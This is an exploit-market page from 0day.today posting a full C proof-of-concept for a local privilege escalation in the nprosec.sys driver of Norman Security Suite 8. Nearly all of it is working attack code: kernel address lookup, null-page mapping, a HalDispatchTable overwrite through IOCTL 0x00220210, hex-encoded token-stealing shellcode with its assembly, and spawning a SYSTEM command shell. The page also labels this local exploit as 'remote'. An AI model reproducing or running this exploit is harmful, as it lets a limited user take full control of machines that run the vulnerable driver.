[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Norman Security Suite 8 (nprosec.sys) Local Privilege Escalation 0day

Author
Xst3nZ
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16878
Category
remote exploits
Date add
27-09-2011
Platform
windows
#include <stdio.h>
#include <windows.h>
#include <winioctl.h>
#include <tchar.h>
 
/*
 
Discovered by  : Xst3nZ (Jérémy Brun-Nouvion)
 
 
----[ Software ]-------------------------------------------------------------------------
 
Program        : Norman Security Suite 8
Official page  : http://www.norman.com/products/security_suite/en
Description    : "This easy-to-use software will protect you from inappropriate content,
                  rootkits and other hostile activity, whether you are using online
                  banking, chatting, emailing, playing games or just surfing the net."
          This suite contains: Intrusion Guards, Privacy Tools,
              Norman Scanner Engine, Personal Firewall, Antivirus
Certified by   : OPSWAT
 
 
----[ Vulnerability ]--------------------------------------------------------------------
 
Discovery        : 2011-09-26
Description      : The driver "nprosec.sys" is vulnerable to a kernel pointer dereferencement.
                   This vulnerability allows an attacker with a local access to the machine
           to escalate his privilege, that is to say to gain SYSTEM privileges from
           a limited account.
Affected IOCTL   : 0x00220210
 
Status           : 0day
Vendor contacted : 2011-09-28
 
 
----[ Contact ]--------------------------------------------------------------------------
 
Mail           : xst3nz (at) gmail (dot) com
Twitter        : @Xst3nZ
Personal Blog  : http://poppopret.blogspot.com
 
 
----[ Exploitation PoC ]-----------------------------------------------------------------
 
Tested on      : Windows XP SP3 (offsets may be changed for other versions)
Demo           :
 
[~] Open an handle to the driver \\.\nprosec ...
[+] Handle: 000007E8
[~] Retrieve Kernel address of HalDispatchTable ...
[+] HalDispatchTable+4 (0x8054593c) will be overwritten
[~] Map executable memory 0x00000000 - 0x0000FFFF ...
[~] Put the Shellcode to steal System process Token @ 0x00005000
[~] Update Shellcode with PID of the current process ...
[+] Shellcode updated with PID = 3604
 
[~] Ready ? Press any key to send IOCTL (0x00220210) with payload...
[+] IOCTL sent !
[~] Launch the shellcode ...
[+] Okay... System Token should be stolen, let's spawn a SYSTEM shell :)
 
 
----[ GreetZ ]---------------------------------------------------------------------------
 
Heurs
 
*/
 
 
typedef struct {
    PVOID   Unknown1;
    PVOID   Unknown2;
    PVOID   Base;
    ULONG   Size;
    ULONG   Flags;
    USHORT  Index;
    USHORT  NameLength;
    USHORT  LoadCount;
    USHORT  PathLength;
    CHAR    ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
  
typedef struct {
    ULONG   Count;
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
 
typedef enum _SYSTEM_INFORMATION_CLASS {
  SystemModuleInformation = 11,
  SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;
 
typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
   SYSTEM_INFORMATION_CLASS SystemInformationClass,
   PVOID SystemInformation,
   ULONG SystemInformationLength,
   PULONG ReturnLength
);
typedef NTSTATUS (__stdcall *_NtQueryIntervalProfile)(DWORD ProfileSource, PULONG Interval);
typedef NTSTATUS (__stdcall *_NtAllocateVirtualMemory)(HANDLE ProcessHandle, PVOID *BaseAddress,
                                                       ULONG_PTR ZeroBits, PSIZE_T RegionSize,
                                                       ULONG AllocationType, ULONG Protect);
 
 
ULONG_PTR HalDispatchTable;
SYSTEM_INFO GlobalInfo;
 
 
// Retrieve the real kernel address of a given symbol -----------------------------------
FARPROC GetKernAddress(HMODULE UserKernBase, PVOID RealKernelBase, LPCSTR SymName) {
    PUCHAR KernBaseTemp     = (PUCHAR)UserKernBase;
    PUCHAR RealKernBaseTemp = (PUCHAR)RealKernelBase;
    PUCHAR temp = (PUCHAR)GetProcAddress(UserKernBase, SymName);
    if(temp == NULL)
        return NULL;
         
    return (FARPROC)(temp - KernBaseTemp + RealKernBaseTemp);
}
 
// Retrieve kernel address of HalDispatchTable ------------------------------------------
BOOL LoadAndGetKernelBase() {
    CHAR kFullName[256];
    PVOID kBase=NULL;
    LPSTR kName;
    HMODULE NTosHandle;
    _NtQuerySystemInformation NtQuerySystemInformation;
    PSYSTEM_MODULE_INFORMATION pModuleInfo;
    ULONG len;
    NTSTATUS ret;
    HMODULE ntdllHandle;
 
    ntdllHandle = GetModuleHandle((LPCTSTR)"ntdll");
    if(!ntdllHandle) {
        return FALSE;
    }
 
    NtQuerySystemInformation =  (_NtQuerySystemInformation)GetProcAddress(ntdllHandle,
                                "NtQuerySystemInformation");
    if(!NtQuerySystemInformation) {
        return FALSE;
    }
         
    ret = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
    if(!ret) {
        return FALSE;
    }
         
    pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
    ret = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);
     
     
    memset(kFullName, 0x00, sizeof(kFullName));
    strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName);
    kBase = pModuleInfo->Module[0].Base;
 
    kName = strrchr(kFullName, '\\');
    NTosHandle = LoadLibraryA(++kName);
 
    if(NTosHandle == NULL) {
        return FALSE;
    }
     
    HalDispatchTable = (ULONG_PTR)GetKernAddress(NTosHandle, kBase, "HalDispatchTable");
    if(!HalDispatchTable)
        return FALSE;
 
    return TRUE;
}
 
// Create a child process ---------------------------------------------------------------
BOOL CreateChild(PWCHAR Child) {
 
    PROCESS_INFORMATION pi;
      STARTUPINFO si;
 
    ZeroMemory( &si, sizeof(si) );
    si.cb = sizeof(si);
    ZeroMemory( &pi, sizeof(pi) );
 
    if (!CreateProcess(Child, Child, NULL, NULL, 0, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
        return FALSE;
 
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return TRUE;
}
 
 
// Shellcode used to steal the Access Token of the System process (PID=4) ---------------
/*
 
shellcode:
 
; ----------------------------------------------------------------------
;                  Shellcode for Windows XP SP3
; ----------------------------------------------------------------------
 
; Offsets
WINXP_KTHREAD_OFFSET   equ 124h    ; nt!_KPCR.PcrbData.CurrentThread
WINXP_EPROCESS_OFFSET  equ 044h    ; nt!_KTHREAD.ApcState.Process
WINXP_FLINK_OFFSET     equ 088h    ; nt!_EPROCESS.ActiveProcessLinks.Flink
WINXP_PID_OFFSET       equ 084h    ; nt!_EPROCESS.UniqueProcessId
WINXP_TOKEN_OFFSET     equ 0c8h    ; nt!_EPROCESS.Token
WINXP_SYS_PID          equ 04h     ; PID Process SYSTEM
 
 
pushad                                ; save registers
 
mov eax, fs:[WINXP_KTHREAD_OFFSET]   ; EAX <- current _KTHREAD
mov eax, [eax+WINXP_EPROCESS_OFFSET] ; EAX <- current _KPROCESS == _EPROCESS
push eax
 
 
mov ebx, WINXP_SYS_PID
 
SearchProcessPidSystem:
 
mov eax, [eax+WINXP_FLINK_OFFSET]     ; EAX <- _EPROCESS.ActiveProcessLinks.Flink
sub eax, WINXP_FLINK_OFFSET           ; EAX <- _EPROCESS of the next process
cmp [eax+WINXP_PID_OFFSET], ebx       ; UniqueProcessId == SYSTEM PID ?
jne SearchProcessPidSystem            ; if no, retry with the next process...
 
mov edi, [eax+WINXP_TOKEN_OFFSET]     ; EDI <- Token of process with SYSTEM PID
and edi, 0fffffff8h                   ; Must be aligned by 8
 
pop eax                               ; EAX <- current _EPROCESS
 
 
mov ebx, 41414141h
 
SearchProcessPidToEscalate:
 
mov eax, [eax+WINXP_FLINK_OFFSET]     ; EAX <- _EPROCESS.ActiveProcessLinks.Flink
sub eax, WINXP_FLINK_OFFSET           ; EAX <- _EPROCESS of the next process
cmp [eax+WINXP_PID_OFFSET], ebx       ; UniqueProcessId == PID of the process
                                      ; to escalate ?
jne SearchProcessPidToEscalate        ; if no, retry with the next process...
 
SwapTokens:
 
mov [eax+WINXP_TOKEN_OFFSET], edi     ; We replace the token of the process
                                      ; to escalate by the token of the process
                                      ; with SYSTEM PID
 
PartyIsOver:
 
popad                                 ; restore registers
ret
 
end shellcode
*/
 
char ShellcodeSwapTokens[] = "\x60\x64\xA1\x24\x01\x00\x00\x8B\x40\x44\x50\xBB\x04\x00\x00\x00"
"\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x39\x98\x84\x00\x00"
"\x00\x75\xED\x8B\xB8\xC8\x00\x00\x00\x83\xE7\xF8\x58\xBB\x41\x41"
"\x41\x41\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x39\x98\x84"
"\x00\x00\x00\x75\xED\x89\xB8\xC8\x00\x00\x00\x61\xC3";
 
PUCHAR mapShellcodeSwapTokens = 0x00005000;
 
 
// Function used to update the exploit's PID in the shellcode ---------------------------
BOOL MajShellcodePid(){
     DWORD ProcessID;
     DWORD MagicWord = 0x41414141;
     int i;
      
     ProcessID = (DWORD)GetCurrentProcessId();
     for (i=0; i<sizeof(ShellcodeSwapTokens); i++) {
         if (!memcmp(mapShellcodeSwapTokens+i, &MagicWord, 4)) {
            mapShellcodeSwapTokens[i]   = (DWORD)  ProcessID & 0x000000FF;
            mapShellcodeSwapTokens[i+1] = ((DWORD) ProcessID & 0x0000FF00) >> 8;
            mapShellcodeSwapTokens[i+2] = ((DWORD) ProcessID & 0x00FF0000) >> 16;
            mapShellcodeSwapTokens[i+3] = ((DWORD) ProcessID & 0xFF000000) >> 24;
            return TRUE;
         }
     }
     return FALSE;
}
 
 
// Exploit Main function ----------------------------------------------------------------
int main(int argc, char *argv[]) {
     
    HANDLE hDevice;
 
    DWORD input[] = { 0xffff0000, 0x00000008 };
    DWORD output[0x8];
 
    ULONG dummy = 0;
    PCHAR addr  = (PCHAR)1;
    ULONG size  = 0xffff;
    NTSTATUS status;
 
    ULONG_PTR HalDispatchTableTarget;
    _NtQueryIntervalProfile  NtQueryIntervalProfile;
    _NtAllocateVirtualMemory NtAllocateVirtualMemory;
 
 
    NtQueryIntervalProfile  = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle((LPCSTR)"ntdll.dll"),
                  "NtQueryIntervalProfile");
    NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"),
                          "NtAllocateVirtualMemory");
 
                               
    printf("------------------------------------------------------------------\n");
    printf("     Norman Security Suite 8 (nprosec.sys - IOCTL 0x00220210)     \n");
    printf("   Local Privilege Escalation using Kernel pointer dereference    \n");
    printf("            Proof of Concept tested on Win XP SP3                 \n");
    printf("------------------------------------------------------------------\n\n");
 
    printf("[~] Open an handle to the driver \\\\.\\nprosec ...\n");
    hDevice = CreateFile("\\\\.\\nprosec",
                        GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
 
    if(hDevice == (HANDLE)0xFFFFFFFF) {
        printf("[!] Cannot open a handle to the driver, it is probably not loaded. ");
        printf("Error : %d\n", GetLastError());
        exit(1);
    }
     
    printf("[+] Handle: %p\n",hDevice);
 
 
    printf("[~] Retrieve Kernel address of HalDispatchTable ...\n");   
    if(LoadAndGetKernelBase() == FALSE) {
        printf("[!] An error occured ! Impossible to retrieve the address.\n");
        exit(1);
    }
    HalDispatchTableTarget = HalDispatchTable + sizeof(ULONG_PTR);
    printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", (DWORD)HalDispatchTableTarget);
    input[0] = (DWORD)HalDispatchTableTarget;
 
 
    printf("[~] Map executable memory 0x00000000 - 0x0000FFFF ...\n");
        status = NtAllocateVirtualMemory((HANDLE)0xffffffff, (PVOID *) &addr, 0, &size,
                                          MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
 
    if(status) {
        printf("[!] An error occured while mapping executable memory. Status = 0x%08x\n", status);
        exit(1);
    }
     
     
    printf("[~] Put the Shellcode to steal System process Token @ 0x%08x\n", (DWORD)mapShellcodeSwapTokens);
    memset(1, '\x90', 0xffff);
    RtlCopyMemory(0x00005000, ShellcodeSwapTokens, sizeof(ShellcodeSwapTokens));
 
    printf("[~] Update Shellcode with PID of the current process ...\n");
    if(!MajShellcodePid()) {
        printf("[!] An error occured\n");
        exit(1);
    }
    printf("[+] Shellcode updated with PID = %d\n\n", (DWORD)GetCurrentProcessId());
     
 
    printf("[~] Ready ? Press any key to send IOCTL (0x00220210) with payload...\n");
    getch();
    DeviceIoControl(hDevice, 0x00220210, &input, 0x8, &output, 0x8, NULL, NULL);
    printf("[+] IOCTL sent !\n");
     
    printf("[~] Launch the shellcode ...\n");
    NtQueryIntervalProfile(2, &dummy);
    printf("[+] Okay... System Token should be stolen, let's spawn a SYSTEM shell :)\n");
     
    if (CreateChild(_T("C:\\WINDOWS\\SYSTEM32\\CMD.EXE")) != TRUE) {
        printf("[!] Unable to spawn process. Error: %d\n", GetLastError());
        exit(1);
    }
     
        CloseHandle(hDevice);
    getch();
 
        return 0;  
}



#  0day.today [2024-12-24]  #